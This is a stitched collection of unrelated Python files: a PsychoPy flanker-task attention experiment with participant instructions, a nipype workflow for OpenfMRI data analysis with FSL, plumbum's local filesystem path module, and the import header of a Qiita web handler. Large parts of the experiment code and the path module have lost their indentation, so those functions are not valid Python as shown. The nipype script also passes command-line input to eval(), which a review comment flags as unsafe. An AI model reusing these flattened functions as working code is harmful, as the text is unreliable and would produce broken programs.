                (keys[0][0] in ['j', 'm', 'l', 'p'] and condition.tdir=='right')):
                resp = 'OK'
            else:
                resp = 'NOK'
        else:
            print("TIMEOUT")
            resp = None
        # Reaction time: elapsed since target onset (t0 + d1 + ct + d2)
        rt = self.clock.getTime() - t0 - d2 - ct - d1
        # 'Blank' the screen and wait until we're done with this trial (minus one final flip)
        if self.original:
            self.visFix.draw()
        self.win.flip()
        if self.original:
            self.visFix.draw()
        if not short:
            # (4.0 s hard-codes self.tExp/1000.0 -- keep in sync with tExp)
            tf = waitAndFlip(t0 + 4.0) - t0
        else:
            tf = self.clock.getTime() - t0
        # print("At %0.3f/%0.3f [%s, %s, %s, %s]: d1=%0.3f, ct=%0.3f, d2=%0.3f, rt=%0.3f, tf=%0.3f, resp=%s" %
        #     (self.startTime+t0, t0, condition.cue, condition.tloc, condition.tdir, condition.flank, d1, ct, d2, rt, tf, resp))
        if quit:
            return None
        else:
            return (Bunch(condition=condition, wt=self.startTime+t0, t0=t0, d1=d1, ct=ct, d2=d2, rt=rt, tf=tf, resp=resp))
def practiceBlock(self, maxrun=24):
"""Run a practice block with maxrun=24 (no more than 48!) procedures"""
for i in random.sample(xrange(len(self.procedures)), len(self.procedures)):
res = self._oneProcedure(self.procedures[i], True) # True is probably not as original experiment
if res is None:
return False
self.win.flip()
if res.resp=='OK':
visual.TextStim(self.win, color='black', text="Correct reply (%0.3fs)" % (res.rt)).draw()
elif res.resp=='NOK':
visual.TextStim(self.win, color='red', text="Incorrect reply (%0.3fs)" % (res.rt)).draw()
else:
visual.TextStim(self.win, color='orange', text="No timely response recorded").draw()
self.win.flip()
core.wait(2)
maxrun -= 1
if maxrun==0:
return True
def fullExperiment(self, maxrun=None):
"""Run half of a real experiment in a random sequence (in total 48 target presentation)
Use maxrun to limit the number of runs (mainly useful for testing)
Returns a numpy array of (completed) procedures -- not in the order executed -- each row containing
* the (clock referenced) starting time t0,
* the index of the experiment,
* the warning type [0-3] (none, center, double or spatial),
* the congruency [0-2] (congruent, incongruent, neutral),
* the d1 timing (random waiting time before the cue, relative to t0)
* the cue timing (should be around 100ms)
* the time from cue to target (should be around 400ms)
* the users response time (max 1.7s)
* the total time until ready for next proceudre (should be around 4.0s)
* 1 if the user replied correctly, 0 otherwise
* 1 indicating a completed experiment; should always be 1 in the returned array
"""
expData = np.zeros((len(self.procedures), 11))
def c2s(condition, sep=';'):
return "%s%s%s%s%s%s%s" % (condition.cue, sep, condition.tloc, sep, condition.tdir, sep, condition.flank)
for i in random.sample(xrange(len(self.procedures)), len(self.procedures)):
res = self._oneProcedure(self.procedures[i])
if res is None:
return None
if self.logfile:
self.logfile.write("%0.3f;%0.3f;%s;%0.3f;%0.3f;%0.3f;%0.3f;%0.3f;%s\n" %
(res.wt, res.t0, c2s(res.condition), res.d1, res.ct, res.d2, res.rt, res.tf, res.resp))
else:
print("%0.3f;%0.3f;%s;%0.3f;%0.3f;%0.3f;%0.3f;%0.3f;%s" %
(res.wt, res.t0, c2s(res.condition), res.d1, res.ct, res.d2, res.rt, res.tf, res.resp))
cond = self.procedures[i]
if cond.cue=='no':
warningType = 0
elif cond.cue=='center':
warningType = 1
elif cond.cue=='double':
warningType = 2
elif cond.cue=='spatial':
warningType = 3
else:
sys.stderr.write("ERROR: Unknown cue '%s' in experiment. Programming error. Halting execution.\n" % cond.cue)
if cond.flank=='congruent':
congruency = 0
elif cond.flank=='incongruent':
congruency = 1
elif cond.flank=='neutral':
congruency = 2
else:
sys.stderr.write("ERROR: Unknown flank '%s' in experiment. Programming error. Halting execution.\n" % cond.flank)
expData[i] = (res.t0, i, warningType, congruency, res.d1, res.ct, res.d2, res.rt, res.tf, 1 if res.resp=='OK' else 0, 1)
if maxrun is not None:
maxrun -= 1
if maxrun==0:
break
return expData[expData[:,10]==1]
# The following text is adapted from the original (Visual Basic?) experiment
# For the validity of the rule of thumb, see
# Robert P O'Shea: "Thumb's rule tested: visual angle of thumb's width is about 2 deg."
# Perception June 1991 vol. 20 no. 3 415-418 (doi: 10.1068/p200415)
_instructions1 = 'This is an experiment investigating attention. You will be shown ' + \
'an arrow on the screen pointing either to the left or to the right, ' + \
'for example -> or <- . On some trials, the arrow will be flanked ' + \
'by two arrows to the left and two arrows to the right. Examples might be:\n' + \
'\n' + \
' ->->->->->\n' + \
'\n' + \
' ->-><-->->\n' + \
'\n' + \
'Your task is to respond to the direction of the CENTRAL arrow. You ' + \
'should press either "z", "a", "q", "f" or the left arrow your left finger if the ' + \
'central arrow points to the left or press the "m", "l", "p", "j" or right arrow ' + \
'with your right finger if the central arrow points to the right. Place ' + \
'your fingers on the keys you decide to use and keep them in position.\n' + \
'\n' + \
'Please place your eyes approx 60 cm from the screen. ' + \
'The line to the right should be approx 2.1 cm long and appear as 2 deg of visual angle ' + \
'(often the width of your thumb at an arms length is be 2 deg wide).\n' + \
'\n' + \
'Please make your response as quickly and accurately as possible. ' + \
'Your reaction time and accuracy will be recorded.\n' + \
'\n' + \
'There will be a cross + in the center of the screen and the arrows ' + \
'will appear either above or below the cross. You should try to ' + \
'fixate on the cross throughout the experiment.\n' + \
'\n' + \
'On some trials there will be asterisk cues indicating when or where ' + \
'the arrow will occur. If the cue is at the center or both above ' + \
'and below fixation it indicates that the arrow will appear shortly. ' + \
'If the cue is only above or below fixation it indicates both that ' + \
'the trial will occur shortly and where it will occur. Try to ' + \
'maintain fixation at all times. However, you may attend when and ' + \
'where indicated by the cues.\n' + \
'\n' + \
'Press any key to go to the next page.'
_instructions2 = 'The experiment contains four blocks. The first block is for practice ' + \
'and takes about two minutes. ' + \
'\n' + \
'The other three blocks are experimental blocks and each takes about ' + \
'five minutes. After each block there will be a message "take a ' + \
'break" and you may take a short rest. After it, you can press the ' + \
'space bar to begin the next block.\n' + \
'\n' + \
'The whole experiment takes about twenty minutes.\n' + \
'\n' + \
'Hitting the "escape" key will abort the experiment.\n' + \
'\n' + \
'If you have any question, please ask the experimenter.\n' + \
'\n' + \
'Press any key to start the practice session or hit the "escape" key to go directly to the experiment.'
def displayText(self, text, showLine=True, noWait=False, time=2):
"""Display some text and wait for the user to hit a key
noWait can be True, in which case the text is displayed for time seconds
showLine can be False if you don't want the 2 deg line next to the text
Returns True if the user hit 'escape' (presumably to abort/interrupt the run)
"""
self.win.flip()
visual.TextStim(self.win, alignHoriz='center', wrapWidth=12, height=0.01, color='black', text=text).draw()
if showLine:
visual.Line(self.win, start=(-7,-1), end=(-7,1), lineColor='black').draw()
visual.Line(self.win, start=(-7.1,-1), end=(-6.9,-1), lineColor='black').draw()
visual.Line(self.win, start=(-7.1,1), end=(-6.9,1), lineColor='black').draw()
self.win.flip()
if noWait:
core.wait(time)
self.win.flip()
return False
else:
keys = event.waitKeys()
self.win.flip()
return keys[0]=='escape'
def displayInstructions(self):
"""Show instructions and wait for the user to be ready
The 2 deg line next to the instructions can be used as a rough rule-of-thumb calibration
Returns True if the user wishes to skip the practice session
"""
if not self.displayText(self._instructions1):
noPractice = self.displayText(self._instructions2)
else:
noPractice = True
return noPractice
|
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
============================
fMRI: OpenfMRI.org data, FSL
============================
A growing number of datasets are available on `OpenfMRI <http://openfmri.org>`_.
This script demonstrates how to use nipype to analyze a data set.
python fmri_openfmri.py --datasetdir ds107
"""
from nipype import config
config.enable_provenance()
from glob import glob
import os
import nipype.pipeline.engine as pe
import nipype.algorithms.modelgen as model
import nipype.algorithms.rapidart as ra
import nipype.interfaces.fsl as fsl
import nipype.interfaces.io as nio
import nipype.interfaces.utility as niu
from nipype.workflows.fmri.fsl import (create_featreg_preproc,
create_modelfit_workflow,
create_fixed_effects_flow,
create_reg_workflow)
fsl.FSLCommand.set_default_output_type('NIFTI_GZ')
def get_subjectinfo(subject_id, base_dir, task_id, model_id):
"""Get info for a given subject
Parameters
----------
subject_id : string
Subject identifier (e.g., sub001)
base_dir : string
Path to base directory of the dataset
task_id : int
Which task to process
model_id : int
Which model to process
Returns
-------
run_ids : list of ints
Run numbers
conds : list of str
Condition names
TR : float
Repetition time
"""
from glob import glob
import os
import numpy as np
condition_info = []
cond_file = os.path.join(base_dir, 'models', 'model%03d' % model_id,
'condition_key.txt')
with open(cond_file, 'rt') as fp:
for line in fp:
info = line.strip().split()
condition_info.append([info[0], info[1], ' '.join(info[2:])])
if len(condition_info) == 0:
raise ValueError('No condition info found in %s' % cond_file)
taskinfo = np.array(condition_info)
n_tasks = len(np.unique(taskinfo[:, 0]))
conds = []
run_ids = []
if task_id > n_tasks:
raise ValueError('Task id %d does not exist' % task_id)
for idx in range(n_tasks):
taskidx = np.where(taskinfo[:, 0] == 'task%03d' % (idx + 1))
conds.append([condition.replace(' ', '_') for condition
in taskinfo[taskidx[0], 2]])
files = glob(os.path.join(base_dir,
subject_id,
'BOLD',
'task%03d_run*' % (idx + 1)))
run_ids.insert(idx, range(1, len(files) + 1))
TR = np.genfromtxt(os.path.join(base_dir, 'scan_key.txt'))[1]
return run_ids[task_id - 1], conds[task_id - 1], TR
def analyze_openfmri_dataset(data_dir, subject=None, model_id=None,
                             task_id=None, output_dir=None):
    """Analyzes an open fmri dataset

    Parameters
    ----------
    data_dir : str
        Path to the base data directory
    subject : str or None
        Subject to process (e.g. 'sub001'); when None, the first two
        subjects found under data_dir are iterated
    model_id : int
        Model index (models/model%03d)
    task_id : int
        Task index (1-based)
    output_dir : str
        Base directory handed to the datasink

    Returns
    -------
    wf : nipype Workflow, wired up and ready to run()
    """
    """
    Load nipype workflows
    """
    preproc = create_featreg_preproc(whichvol='first')
    modelfit = create_modelfit_workflow()
    fixed_fx = create_fixed_effects_flow()
    registration = create_reg_workflow()
    """
    Remove the plotting connection so that plot iterables don't propagate
    to the model stage
    """
    preproc.disconnect(preproc.get_node('plot_motion'), 'out_file',
                       preproc.get_node('outputspec'), 'motion_plots')
    """
    Set up openfmri data specific components
    """
    # every sub* directory under data_dir is a candidate subject
    subjects = [path.split(os.path.sep)[-1] for path in
                glob(os.path.join(data_dir, 'sub*'))]
    infosource = pe.Node(niu.IdentityInterface(fields=['subject_id',
                                                       'model_id',
                                                       'task_id']),
                         name='infosource')
    if subject is None:
        # NOTE(review): only the first two subjects are iterated here -- confirm intent
        infosource.iterables = [('subject_id', subjects[:2]),
                                ('model_id', [model_id]),
                                ('task_id', [task_id])]
    else:
        infosource.iterables = [('subject_id',
                                 [subjects[subjects.index(subject)]]),
                                ('model_id', [model_id]),
                                ('task_id', [task_id])]
    subjinfo = pe.Node(niu.Function(input_names=['subject_id', 'base_dir',
                                                 'task_id', 'model_id'],
                                    output_names=['run_id', 'conds', 'TR'],
                                    function=get_subjectinfo),
                       name='subjectinfo')
    subjinfo.inputs.base_dir = data_dir
    """
    Return data components as anat, bold and behav
    """
    datasource = pe.Node(nio.DataGrabber(infields=['subject_id', 'run_id',
                                                   'task_id', 'model_id'],
                                         outfields=['anat', 'bold', 'behav',
                                                    'contrasts']),
                         name='datasource')
    datasource.inputs.base_directory = data_dir
    datasource.inputs.template = '*'
    datasource.inputs.field_template = {'anat': '%s/anatomy/highres001.nii.gz',
                                        'bold': '%s/BOLD/task%03d_r*/bold.nii.gz',
                                        'behav': ('%s/model/model%03d/onsets/task%03d_'
                                                  'run%03d/cond*.txt'),
                                        'contrasts': ('models/model%03d/'
                                                      'task_contrasts.txt')}
    datasource.inputs.template_args = {'anat': [['subject_id']],
                                       'bold': [['subject_id', 'task_id']],
                                       'behav': [['subject_id', 'model_id',
                                                  'task_id', 'run_id']],
                                       'contrasts': [['model_id']]}
    datasource.inputs.sort_filelist = True
    """
    Create meta workflow
    """
    wf = pe.Workflow(name='openfmri')
    wf.connect(infosource, 'subject_id', subjinfo, 'subject_id')
    wf.connect(infosource, 'model_id', subjinfo, 'model_id')
    wf.connect(infosource, 'task_id', subjinfo, 'task_id')
    wf.connect(infosource, 'subject_id', datasource, 'subject_id')
    wf.connect(infosource, 'model_id', datasource, 'model_id')
    wf.connect(infosource, 'task_id', datasource, 'task_id')
    wf.connect(subjinfo, 'run_id', datasource, 'run_id')
    wf.connect([(datasource, preproc, [('bold', 'inputspec.func')]),
                ])
    # helper below runs inside a Function node: must stay self-contained
    def get_highpass(TR, hpcutoff):
        return hpcutoff / (2 * TR)
    gethighpass = pe.Node(niu.Function(input_names=['TR', 'hpcutoff'],
                                       output_names=['highpass'],
                                       function=get_highpass),
                          name='gethighpass')
    wf.connect(subjinfo, 'TR', gethighpass, 'TR')
    wf.connect(gethighpass, 'highpass', preproc, 'inputspec.highpass')
    """
    Setup a basic set of contrasts, a t-test per condition
    """
    def get_contrasts(contrast_file, task_id, conds):
        # runs inside a Function node: keep the numpy import local
        import numpy as np
        contrast_def = np.genfromtxt(contrast_file, dtype=object)
        contrasts = []
        for row in contrast_def:
            if row[0] != 'task%03d' % task_id:
                continue
            con = [row[1], 'T', ['cond%03d' % i for i in range(len(conds))],
                   row[2:].astype(float).tolist()]
            contrasts.append(con)
        return contrasts
    contrastgen = pe.Node(niu.Function(input_names=['contrast_file',
                                                    'task_id', 'conds'],
                                       output_names=['contrasts'],
                                       function=get_contrasts),
                          name='contrastgen')
    # artifact detection over each run's realigned files/motion parameters
    art = pe.MapNode(interface=ra.ArtifactDetect(use_differences=[True, False],
                                                 use_norm=True,
                                                 norm_threshold=1,
                                                 zintensity_threshold=3,
                                                 parameter_source='FSL',
                                                 mask_type='file'),
                     iterfield=['realigned_files', 'realignment_parameters',
                                'mask_file'],
                     name="art")
    modelspec = pe.Node(interface=model.SpecifyModel(),
                        name="modelspec")
    modelspec.inputs.input_units = 'secs'
    wf.connect(subjinfo, 'TR', modelspec, 'time_repetition')
    wf.connect(datasource, 'behav', modelspec, 'event_files')
    wf.connect(subjinfo, 'TR', modelfit, 'inputspec.interscan_interval')
    wf.connect(subjinfo, 'conds', contrastgen, 'conds')
    wf.connect(datasource, 'contrasts', contrastgen, 'contrast_file')
    wf.connect(infosource, 'task_id', contrastgen, 'task_id')
    wf.connect(contrastgen, 'contrasts', modelfit, 'inputspec.contrasts')
    wf.connect([(preproc, art, [('outputspec.motion_parameters',
                                 'realignment_parameters'),
                                ('outputspec.realigned_files',
                                 'realigned_files'),
                                ('outputspec.mask', 'mask_file')]),
                (preproc, modelspec, [('outputspec.highpassed_files',
                                       'functional_runs'),
                                      ('outputspec.motion_parameters',
                                       'realignment_parameters')]),
                (art, modelspec, [('outlier_files', 'outlier_files')]),
                (modelspec, modelfit, [('session_info',
                                        'inputspec.session_info')]),
                (preproc, modelfit, [('outputspec.highpassed_files',
                                     'inputspec.functional_data')])
                ])
    """
    Reorder the copes so that now it combines across runs
    """
    # transpose per-run lists of contrast images into per-contrast lists
    def sort_copes(files):
        numelements = len(files[0])
        outfiles = []
        for i in range(numelements):
            outfiles.insert(i, [])
            for j, elements in enumerate(files):
                outfiles[i].append(elements[i])
        return outfiles
    def num_copes(files):
        return len(files)
    pickfirst = lambda x: x[0]
    wf.connect([(preproc, fixed_fx, [(('outputspec.mask', pickfirst),
                                      'flameo.mask_file')]),
                (modelfit, fixed_fx, [(('outputspec.copes', sort_copes),
                                       'inputspec.copes'),
                                      ('outputspec.dof_file',
                                       'inputspec.dof_files'),
                                      (('outputspec.varcopes',
                                        sort_copes),
                                       'inputspec.varcopes'),
                                      (('outputspec.copes', num_copes),
                                       'l2model.num_copes'),
                                      ])
                ])
    wf.connect(preproc, 'outputspec.mean', registration, 'inputspec.mean_image')
    wf.connect(datasource, 'anat', registration, 'inputspec.anatomical_image')
    registration.inputs.inputspec.target_image = fsl.Info.standard_image('MNI152_T1_2mm.nii.gz')
    # merge copes+varcopes into one list so they go through registration together
    def merge_files(copes, varcopes):
        out_files = []
        splits = []
        out_files.extend(copes)
        splits.append(len(copes))
        out_files.extend(varcopes)
        splits.append(len(varcopes))
        return out_files, splits
    mergefunc = pe.Node(niu.Function(input_names=['copes', 'varcopes'],
                                     output_names=['out_files', 'splits'],
                                     function=merge_files),
                        name='merge_files')
    wf.connect([(fixed_fx.get_node('outputspec'), mergefunc,
                 [('copes', 'copes'),
                  ('varcopes', 'varcopes'),
                  ])])
    wf.connect(mergefunc, 'out_files', registration, 'inputspec.source_files')
    # undo the merge after registration, using the recorded split sizes
    def split_files(in_files, splits):
        copes = in_files[:splits[1]]
        varcopes = in_files[splits[1]:]
        return copes, varcopes
    splitfunc = pe.Node(niu.Function(input_names=['in_files', 'splits'],
                                     output_names=['copes', 'varcopes'],
                                     function=split_files),
                        name='split_files')
    wf.connect(mergefunc, 'splits', splitfunc, 'splits')
    wf.connect(registration, 'outputspec.transformed_files',
               splitfunc, 'in_files')
    """
    Connect to a datasink
    """
    # filename substitutions that turn nipype's node-derived paths into tidy names
    def get_subs(subject_id, conds, model_id, task_id):
        subs = [('_subject_id_%s_' % subject_id, '')]
        subs.append(('_model_id_%d' % model_id, 'model%03d' %model_id))
        subs.append(('task_id_%d/' % task_id, '/task%03d_' % task_id))
        subs.append(('bold_dtype_mcf_mask_smooth_mask_gms_tempfilt_mean_warp_warp',
                     'mean'))
        for i in range(len(conds)):
            subs.append(('_flameo%d/cope1.' % i, 'cope%02d.' % (i + 1)))
            subs.append(('_flameo%d/varcope1.' % i, 'varcope%02d.' % (i + 1)))
            subs.append(('_flameo%d/zstat1.' % i, 'zstat%02d.' % (i + 1)))
            subs.append(('_flameo%d/tstat1.' % i, 'tstat%02d.' % (i + 1)))
            subs.append(('_flameo%d/res4d.' % i, 'res4d%02d.' % (i + 1)))
            subs.append(('_warpall%d/cope1_warp_warp.' % i,
                         'cope%02d.' % (i + 1)))
            subs.append(('_warpall%d/varcope1_warp_warp.' % (len(conds) + i),
                         'varcope%02d.' % (i + 1)))
        return subs
    subsgen = pe.Node(niu.Function(input_names=['subject_id', 'conds',
                                                'model_id', 'task_id'],
                                   output_names=['substitutions'],
                                   function=get_subs),
                      name='subsgen')
    datasink = pe.Node(interface=nio.DataSink(),
                       name="datasink")
    wf.connect(infosource, 'subject_id', datasink, 'container')
    wf.connect(infosource, 'subject_id', subsgen, 'subject_id')
    wf.connect(infosource, 'model_id', subsgen, 'model_id')
    wf.connect(infosource, 'task_id', subsgen, 'task_id')
    wf.connect(contrastgen, 'contrasts', subsgen, 'conds')
    wf.connect(subsgen, 'substitutions', datasink, 'substitutions')
    wf.connect([(fixed_fx.get_node('outputspec'), datasink,
                 [('res4d', 'res4d'),
                  ('copes', 'copes'),
                  ('varcopes', 'varcopes'),
                  ('zstats', 'zstats'),
                  ('tstats', 'tstats')])
                ])
    wf.connect([(splitfunc, datasink,
                 [('copes', 'copes.mni'),
                  ('varcopes', 'varcopes.mni'),
                  ])])
    wf.connect(registration, 'outputspec.transformed_mean', datasink, 'mean.mni')
    """
    Set processing parameters
    """
    hpcutoff = 120.
    preproc.inputs.inputspec.fwhm = 6.0
    gethighpass.inputs.hpcutoff = hpcutoff
    modelspec.inputs.high_pass_filter_cutoff = hpcutoff
    modelfit.inputs.inputspec.bases = {'dgamma': {'derivs': True}}
    modelfit.inputs.inputspec.model_serial_correlations = True
    modelfit.inputs.inputspec.film_threshold = 1000
    datasink.inputs.base_directory = output_dir
    return wf
if __name__ == '__main__':
    import argparse
    defstr = ' (default %(default)s)'
    parser = argparse.ArgumentParser(prog='fmri_openfmri.py',
                                     description=__doc__)
    parser.add_argument('-d', '--datasetdir', required=True)
    parser.add_argument('-s', '--subject', default=None,
                        help="Subject name (e.g. 'sub001')")
    parser.add_argument('-m', '--model', default=1,
                        help="Model index" + defstr)
    parser.add_argument('-t', '--task', default=1,
                        help="Task index" + defstr)
    parser.add_argument("-o", "--output_dir", dest="outdir",
                        help="Output directory base")
    # NOTE(review): help text appears copy-pasted from -o; should read "Working directory base"
    parser.add_argument("-w", "--work_dir", dest="work_dir",
                        help="Output directory base")
    parser.add_argument("-p", "--plugin", dest="plugin",
                        default='Linear',
                        help="Plugin to use")
    parser.add_argument("--plugin_args", dest="plugin_args",
                        help="Plugin arguments")
    args = parser.parse_args()
    outdir = args.outdir
    work_dir = os.getcwd()
    if args.work_dir:
        work_dir = os.path.abspath(args.work_dir)
    if outdir:
        outdir = os.path.abspath(outdir)
    else:
        outdir = os.path.join(work_dir, 'output')
    # NOTE(review): directory name uses model%02d while the datasink substitutions
    # inside analyze_openfmri_dataset use model%03d -- confirm the intended naming
    outdir = os.path.join(outdir, 'model%02d' % int(args.model),
                          'task%03d' % int(args.task))
    wf = analyze_openfmri_dataset(data_dir=os.path.abspath(args.datasetdir),
                                  subject=args.subject,
                                  model_id=int(args.model),
                                  task_id=int(args.task),
                                  output_dir=outdir)
    wf.base_dir = work_dir
    if args.plugin_args:
        # NOTE(review): eval() executes arbitrary code from the command line;
        # ast.literal_eval would be safer for dict-style plugin arguments
        wf.run(args.plugin, plugin_args=eval(args.plugin_args))
    else:
        wf.run(args.plugin)
|
|
from __future__ import with_statement
import os
import sys
import glob
import shutil
import errno
import logging
from contextlib import contextmanager
from plumbum.lib import _setdoc, IS_WIN32
from plumbum.path.base import Path, FSUser
from plumbum.path.remote import RemotePath
try:
    # POSIX-only modules, used to map uid/gid numbers to user/group names
    from pwd import getpwuid, getpwnam
    from grp import getgrgid, getgrnam
except ImportError:
    # Windows has no pwd/grp: id->name lookups degrade to a None name,
    # name->id lookups fail loudly
    def getpwuid(x):
        return (None,)
    def getgrgid(x):
        return (None,)
    def getpwnam(x):
        raise OSError("`getpwnam` not supported")
    def getgrnam(x):
        raise OSError("`getgrnam` not supported")
logger = logging.getLogger("plumbum.local")
#===================================================================================================
# Local Paths
#===================================================================================================
class LocalPath(Path):
    """The class implementing local-machine paths"""
    # only the normalized path string is stored; no per-instance __dict__
    __slots__ = ["_path"]
    # local filesystem case-sensitivity: Windows paths compare case-insensitively
    CASE_SENSITIVE = not IS_WIN32
def __init__(self, *parts):
if not parts:
raise TypeError("At least one path part is require (none given)")
if any(isinstance(path, RemotePath) for path in parts):
raise TypeError("LocalPath cannot be constructed from %r" % (parts,))
self._path = os.path.normpath(os.path.join(*(str(p) for p in parts)))
def __new__(cls, *parts):
if len(parts) == 1 and \
isinstance(parts[0], cls) and \
not isinstance(parts[0], LocalWorkdir):
return parts[0]
return object.__new__(cls)
    def __str__(self):
        # the normalized path string is the canonical textual form
        return self._path
    def _get_info(self):
        # comparison/identity key -- presumably consumed by the Path base
        # class for equality and hashing; verify against plumbum.path.base
        return self._path
    def __getstate__(self):
        # pickle support: with __slots__ there is no __dict__, so expose
        # the single slot explicitly
        return {"_path" : self._path}
    def _form(self, *parts):
        # factory hook: build a sibling path of the same (local) flavor
        return LocalPath(*parts)
@property
@_setdoc(Path)
def basename(self):
return os.path.basename(str(self))
@property
@_setdoc(Path)
def dirname(self):
return LocalPath(os.path.dirname(str(self)))
    @property
    @_setdoc(Path)
    def uid(self):
        # owner uid plus best-effort user name (name is None where pwd is unavailable)
        uid = self.stat().st_uid
        name = getpwuid(uid)[0]
        return FSUser(uid, name)
    @property
    @_setdoc(Path)
    def gid(self):
        # group gid plus best-effort group name (name is None where grp is unavailable)
        gid = self.stat().st_gid
        name = getgrgid(gid)[0]
        return FSUser(gid, name)
    @_setdoc(Path)
    def join(self, *others):
        # equivalent to self / other1 / other2 / ...
        return LocalPath(self, *others)
@_setdoc(Path)
def list(self):
return [self / fn for fn in os.listdir(str(self))]
    @_setdoc(Path)
    def isdir(self):
        # True for directories (follows symlinks)
        return os.path.isdir(str(self))
    @_setdoc(Path)
    def isfile(self):
        # True for regular files (follows symlinks)
        return os.path.isfile(str(self))
    @_setdoc(Path)
    def islink(self):
        # True when the path itself is a symbolic link
        return os.path.islink(str(self))
    @_setdoc(Path)
    def exists(self):
        # True when the path exists (broken symlinks report False)
        return os.path.exists(str(self))
    @_setdoc(Path)
    def stat(self):
        # raises OSError when the path does not exist
        return os.stat(str(self))
@_setdoc(Path)
def glob(self, pattern):
return [LocalPath(fn) for fn in glob.glob(str(self / pattern))]
    @_setdoc(Path)
    def delete(self):
        # remove this path: rmtree for directories, remove for files; no-op when absent
        if not self.exists():
            return
        if self.isdir():
            shutil.rmtree(str(self))
        else:
            try:
                os.remove(str(self))
            except OSError:
                # file might already been removed (a race with other threads/processes)
                _, ex, _ = sys.exc_info()  # py2/py3-compatible way to grab the exception
                if ex.errno != errno.ENOENT:
                    raise
    @_setdoc(Path)
    def move(self, dst):
        # moving onto a remote machine is not supported through this API
        if isinstance(dst, RemotePath):
            raise TypeError("Cannot move local path %s to %r" % (self, dst))
        shutil.move(str(self), str(dst))
        # return the destination wrapped as a LocalPath for chaining
        return LocalPath(dst)
    @_setdoc(Path)
    def copy(self, dst, override = False):
        # copy a file or directory tree to dst; `override` deletes dst first
        if isinstance(dst, RemotePath):
            raise TypeError("Cannot copy local path %s to %r" % (self, dst))
        dst = LocalPath(dst)
        if override:
            dst.delete()
        if self.isdir():
            shutil.copytree(str(self), str(dst))
        else:
            # make sure the destination's parent directory exists
            dst_dir = LocalPath(dst).dirname
            if not dst_dir.exists():
                dst_dir.mkdir()
            # copy2 preserves metadata (timestamps, permissions)
            shutil.copy2(str(self), str(dst))
        return dst
    @_setdoc(Path)
    def mkdir(self):
        # create the directory (including missing parents); no-op when it exists
        if not self.exists():
            try:
                os.makedirs(str(self))
            except OSError:
                # directory might already exist (a race with other threads/processes)
                _, ex, _ = sys.exc_info()  # py2/py3-compatible way to grab the exception
                if ex.errno != errno.EEXIST:
                    raise
    @_setdoc(Path)
    def open(self, mode = "rb"):
        # Open the underlying file; defaults to binary read.
        return open(str(self), mode)
@_setdoc(Path)
def read(self, encoding=None):
with self.open("rb") as f:
data = f.read()
if encoding:
data = data.decode(encoding)
return data
@_setdoc(Path)
def write(self, data, encoding=None):
if encoding:
data = data.encode(encoding)
with self.open("wb") as f:
f.write(data)
    @_setdoc(Path)
    def chown(self, owner = None, group = None, recursive = None):
        # Change ownership. Names are resolved through the pwd/grp databases,
        # ints are used verbatim; ``recursive=None`` means "recurse if a dir".
        if not hasattr(os, "chown"):
            raise OSError("os.chown() not supported")
        uid = self.uid if owner is None else (owner if isinstance(owner, int) else getpwnam(owner)[2])
        gid = self.gid if group is None else (group if isinstance(group, int) else getgrnam(group)[2])
        os.chown(str(self), uid, gid)
        if recursive or (recursive is None and self.isdir()):
            for subpath in self.walk():
                os.chown(str(subpath), uid, gid)
    @_setdoc(Path)
    def chmod(self, mode):
        # Change the file mode bits (numeric ``mode``, as for os.chmod).
        if not hasattr(os, "chmod"):
            raise OSError("os.chmod() not supported")
        os.chmod(str(self), mode)
    @_setdoc(Path)
    def access(self, mode = 0):
        # Test accessibility; ``mode`` is translated to os.access flags.
        return os.access(str(self), self._access_mode_to_flags(mode))
    @_setdoc(Path)
    def link(self, dst):
        # Create a hard link at ``dst`` pointing at this path; on platforms
        # without os.link, fall back to the Windows ``mklink`` command.
        if isinstance(dst, RemotePath):
            raise TypeError("Cannot create a hardlink from local path %s to %r" % (self, dst))
        if hasattr(os, "link"):
            os.link(str(self), str(dst))
        else:
            from plumbum.machines.local import local
            # windows: use mklink
            if self.isdir():
                local["cmd"]("/C", "mklink", "/D", "/H", str(dst), str(self))
            else:
                local["cmd"]("/C", "mklink", "/H", str(dst), str(self))
    @_setdoc(Path)
    def symlink(self, dst):
        # Create a symlink at ``dst`` pointing at this path; on platforms
        # without os.symlink, fall back to the Windows ``mklink`` command.
        if isinstance(dst, RemotePath):
            raise TypeError("Cannot create a symlink from local path %s to %r" % (self, dst))
        if hasattr(os, "symlink"):
            os.symlink(str(self), str(dst))
        else:
            from plumbum.machines.local import local
            # windows: use mklink
            if self.isdir():
                local["cmd"]("/C", "mklink", "/D", str(dst), str(self))
            else:
                local["cmd"]("/C", "mklink", str(dst), str(self))
    @_setdoc(Path)
    def unlink(self):
        # Remove this file; ENOENT is tolerated to survive delete races.
        try:
            os.unlink(str(self))
        except OSError:
            # file might already been removed (a race with other threads/processes)
            _, ex, _ = sys.exc_info()
            if ex.errno != errno.ENOENT:
                raise
class LocalWorkdir(LocalPath):
    """Working directory manipulator.

    Wraps the process-wide current working directory; note that ``chdir``
    mutates global process state, not just this object.
    """
    __slots__ = []
    def __init__(self):
        # Snapshot the process CWD at construction time.
        LocalPath.__init__(self, os.getcwd())
    def __hash__(self):
        # The CWD is mutable, so instances must not be used as dict/set keys.
        raise TypeError("unhashable type")
    def __new__(cls):
        # Bypass LocalPath.__new__ (which normalizes string arguments).
        return object.__new__(cls)
    def chdir(self, newdir):
        """Changes the current working directory to the given one
        :param newdir: The destination directory (a string or a ``LocalPath``)
        """
        if isinstance(newdir, RemotePath):
            raise TypeError("newdir cannot be %r" % (newdir,))
        logger.debug("Chdir to %s", newdir)
        os.chdir(str(newdir))
        # Keep the cached path in sync with the real process CWD.
        self._path = os.path.normpath(os.getcwd())
    def getpath(self):
        """Returns the current working directory as a ``LocalPath`` object"""
        return LocalPath(self._path)
    @contextmanager
    def __call__(self, newdir):
        """A context manager used to ``chdir`` into a directory and then ``chdir`` back to
        the previous location; much like ``pushd``/``popd``.
        :param newdir: The destination directory (a string or a ``LocalPath``)
        """
        prev = self._path
        self.chdir(newdir)
        try:
            yield
        finally:
            self.chdir(prev)
|
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from json import loads
from tornado.web import authenticated
from qiita_core.util import execute_as_transaction
from qiita_core.qiita_settings import qiita_config, r_client
from qiita_pet.handlers.base_handlers import BaseHandler
from qiita_pet.handlers.analysis_handlers import check_analysis_access
